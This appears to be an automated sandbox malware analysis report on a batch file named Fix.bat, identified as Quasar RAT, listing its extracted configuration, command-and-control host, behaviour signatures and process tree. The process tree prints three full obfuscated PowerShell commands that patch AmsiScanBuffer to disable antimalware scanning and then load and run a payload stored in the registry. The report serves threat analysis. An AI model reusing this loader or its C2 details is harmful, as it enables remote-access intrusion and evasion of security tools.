Analysis

  • max time kernel
    300s
  • max time network
    303s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-05-2024 19:02

General

  • Target

    Fix.bat

  • Size

    621B

  • MD5

    e235e723f57a72ef725306c3e14d4726

  • SHA1

    9b2153053f8e89c300e32da5df32e9b990594aac

  • SHA256

    aebe0bafeb12706e614a45f2df40518d32d502093517ce95e2d3c1bbfd64ca67

  • SHA512

    0a4eda531be3904ae944d2c1c43755921cde4333a8e9d6bee6669e3de73b6c7859bb7ab3aa7a712fa2085d3fa1fb1d1ed14e5d6ed488a10bd2f6ab6ed049d25e

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

RPad

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-okPqrmZ8kNVUcS4Rp0

Attributes
  • encryption_key

    XmcBnPuLlN1e8SHIRR1z

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-LOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 16 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:380
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{c39a1af8-5042-45c2-9d5f-27a5f91baa40}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3440
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{a516ef98-b82a-4acb-a589-77cdab0370b5}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3532
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{81ad7522-1687-454e-91bf-f3ca515a6eb6}
          2⤵
            PID:1408
        • C:\Windows\system32\lsass.exe
          C:\Windows\system32\lsass.exe
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:948
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:412
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:944
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1084
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:1152
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2768
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:nEHjJCPcYqbL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ueYgXAkpbkCEZj,[Parameter(Position=1)][Type]$YvlgQibBnm)$GcGMWSPtkiY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+'le'+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'De'+'l'+'eg'+'a'+''+'t'+''+[Char](101)+'Ty'+[Char](112)+''+'e'+'','C'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+'bli'+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+'led,'+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+'s'+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$GcGMWSPtkiY.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+'i'+''+'a'+'l'+'N'+'ame'+','+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$ueYgXAkpbkCEZj).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'ti'+'m'+'e'+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$GcGMWSPtkiY.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,'+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+'o'+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+'u'+'a'+''+'l'+'',$YvlgQibBnm,$ueYgXAkpbkCEZj).SetImplementationFlags('R'+'u'+''+'n'+'t'+[Char](105)+''+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');Write-Output $GcGMWSPtkiY.CreateType();}$QtoYilOSYasuy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+'m'+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+'.'+'W'+'in'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+'afe'+'N'+''+'a'+'ti'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+'s');$lHyegANJRXwTdB=$QtoYilOSYasuy.GetMethod(''+'G'+'e'+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+'dd'+'r'+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+'l'+[Char](105)+''+'c'+','+[Char](83)+'t'+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HWGxTYKccbwHKondnnE=nEHjJCPcYqbL @([String])([IntPtr]);$wxiDqJyCIrtijjNTuFNlyB=nEHjJCPcYqbL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wTZukGEJzue=$QtoYilOSYasuy.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+'e'+'l'+'32'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$znsWQsuLVBPjXH=$lHyegANJRXwTdB.Invoke($Null,@([Object]$wTZukGEJzue,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+'y'+'A')));$VgXgeYlQTcAWIcxBt=$lHyegANJRXwTdB.Invoke($Null,@([Object]$wTZukGEJzue,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+'l'+''+[Char](80)+''+'r'+''+'o'+''+'t'+'e'+'c'+''+[Char](116)+'')));$CWJdmjm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($znsWQsuLVBPjXH,$HWGxTYKccbwHKondnnE).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$ZtXpRKxoLVqCAJyrC=$lHyegANJRXwTdB.Invoke($Null,@([Object]$CWJdmjm,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+'c'+''+'a'+''+'n'+''+[Char](66)+'uf'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$udIuFcohOS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VgXgeYlQTcAWIcxBt,$wxiDqJyCIrtijjNTuFNlyB).Invoke($ZtXpRKxoLVqCAJyrC,[uint32]8,4,[ref]$udIuFcohOS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ZtXpRKxoLVqCAJyrC,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VgXgeYlQTcAWIcxBt,$wxiDqJyCIrtijjNTuFNlyB).Invoke($ZtXpRKxoLVqCAJyrC,[uint32]8,0x20,[ref]$udIuFcohOS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+'TW'+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('$7'+'7'+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:3916
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:uGCGZtEEHhju{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$bCebNJvnNHpPYh,[Parameter(Position=1)][Type]$KDEAZtjexV)$wNEzcHkhIwk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+'l'+'e'+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'elega'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+'y'+[Char](112)+'e','C'+'l'+''+'a'+''+[Char](115)+'s,P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+'a'+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+'A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$wNEzcHkhIwk.DefineConstructor('R'+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+'me,'+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'yS'+'i'+''+'g'+''+[Char](44)+'P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$bCebNJvnNHpPYh).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'na'+'g'+'ed');$wNEzcHkhIwk.DefineMethod('I'+'n'+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'Hi'+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+''+'l'+'o'+[Char](116)+','+[Char](86)+'i'+'r'+'tu'+'a'+''+[Char](108)+'',$KDEAZtjexV,$bCebNJvnNHpPYh).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $wNEzcHkhIwk.CreateType();}$vsCocoVMkngAy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+'c'+'r'+''+'o'+'s'+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+'W'+'i'+''+[Char](110)+'32'+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+''+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+'e'+[Char](77)+''+[Char](101)+''+'t'+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$eInuhhhBOjpWRO=$vsCocoVMkngAy.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+'d'+'d'+'r'+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jOLgGTgkLRyLeKZjpZq=uGCGZtEEHhju @([String])([IntPtr]);$TxPqZwzcTpcMSnEOPHTWbb=uGCGZtEEHhju @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jqEetLQWUjX=$vsCocoVMkngAy.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+'H'+[Char](97)+'n'+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$tovMwcFqYZpBgm=$eInuhhhBOjpWRO.Invoke($Null,@([Object]$jqEetLQWUjX,[Object]('Lo'+[Char](97)+''+[Char](100)+''+'L'+'i'+[Char](98)+''+[Char](114)+'a'+'r'+''+'y'+''+[Char](65)+'')));$wsjGdlwNTjjICQSvB=$eInuhhhBOjpWRO.Invoke($Null,@([Object]$jqEetLQWUjX,[Object]('Vi'+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+'t')));$DwnEQvK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tovMwcFqYZpBgm,$jOLgGTgkLRyLeKZjpZq).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+'.'+'dl'+'l'+'');$UnoEPwAhgUVeIsAEz=$eInuhhhBOjpWRO.Invoke($Null,@([Object]$DwnEQvK,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+'i'+''+'S'+''+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$mEmMIjEHwO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wsjGdlwNTjjICQSvB,$TxPqZwzcTpcMSnEOPHTWbb).Invoke($UnoEPwAhgUVeIsAEz,[uint32]8,4,[ref]$mEmMIjEHwO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$UnoEPwAhgUVeIsAEz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wsjGdlwNTjjICQSvB,$TxPqZwzcTpcMSnEOPHTWbb).Invoke($UnoEPwAhgUVeIsAEz,[uint32]8,0x20,[ref]$mEmMIjEHwO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+'7s'+'t'+'a'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3752
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        3⤵
                          PID:1536
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NDwSoEYHQQHU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$gyTnnHveqdUpYm,[Parameter(Position=1)][Type]$DHnXURGZtN)$jCDJEUrdPib=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+'l'+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+'odu'+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+[Char](68)+''+'e'+'l'+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+','+''+'A'+''+[Char](110)+'si'+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+''+','+''+[Char](65)+''+'u'+''+[Char](116)+'o'+'C'+''+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$jCDJEUrdPib.DefineConstructor('RT'+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'me'+[Char](44)+''+'H'+'ide'+'B'+'y'+[Char](83)+'ig,'+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$gyTnnHveqdUpYm).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+'e'+[Char](100)+'');$jCDJEUrdPib.DefineMethod('I'+'n'+''+'v'+'o'+[Char](107)+''+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+'de'+'B'+''+[Char](121)+'S'+[Char](105)+''+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+'t'+'ua'+'l'+'',$DHnXURGZtN,$gyTnnHveqdUpYm).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+'m'+'e'+''+','+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'g'+[Char](101)+''+[Char](100)+'');Write-Output $jCDJEUrdPib.CreateType();}$GIpNAThDQmoJv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+'a'+''+[Char](102)+'eNa'+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$UoJtGIDpigSVbc=$GIpNAThDQmoJv.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+'A'+'d'+'d'+[Char](114)+''+'e'+'s'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'ic'+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zIOMKmJqxEbrpZevPuU=NDwSoEYHQQHU @([String])([IntPtr]);$bpNYyywykInfAaSOTXSgBY=NDwSoEYHQQHU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$awvQFGKMhcP=$GIpNAThDQmoJv.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+'r'+[Char](110)+'e'+[Char](108)+'3'+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$XimHogbNfTEPJM=$UoJtGIDpigSVbc.Invoke($Null,@([Object]$awvQFGKMhcP,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+'b'+'r'+[Char](97)+''+'r'+'yA')));$MmoWDeTffHkKlQouD=$UoJtGIDpigSVbc.Invoke($Null,@([Object]$awvQFGKMhcP,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+'ro'+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$umsZsQN=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XimHogbNfTEPJM,$zIOMKmJqxEbrpZevPuU).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+'l'+'');$TpQidhrqnLJesifnZ=$UoJtGIDpigSVbc.Invoke($Null,@([Object]$umsZsQN,[Object](''+[Char](65)+''+[Char](109)+'s'+'i'+''+'S'+''+'c'+''+[Char](97)+''+[Char](110)+'Bu'+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$NghvhoOgeE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MmoWDeTffHkKlQouD,$bpNYyywykInfAaSOTXSgBY).Invoke($TpQidhrqnLJesifnZ,[uint32]8,4,[ref]$NghvhoOgeE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TpQidhrqnLJesifnZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MmoWDeTffHkKlQouD,$bpNYyywykInfAaSOTXSgBY).Invoke($TpQidhrqnLJesifnZ,[uint32]8,0x20,[ref]$NghvhoOgeE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+'7s'+[Char](116)+'a'+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        PID:1424
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:3520
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                        • Drops file in System32 directory
                        PID:1160
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                        1⤵
                          PID:1212
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1236
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1292
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1312
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1428
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2660
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                    1⤵
                                      PID:1436
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1552
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                        1⤵
                                          PID:1564
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1676
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1688
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1748
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                1⤵
                                                  PID:1784
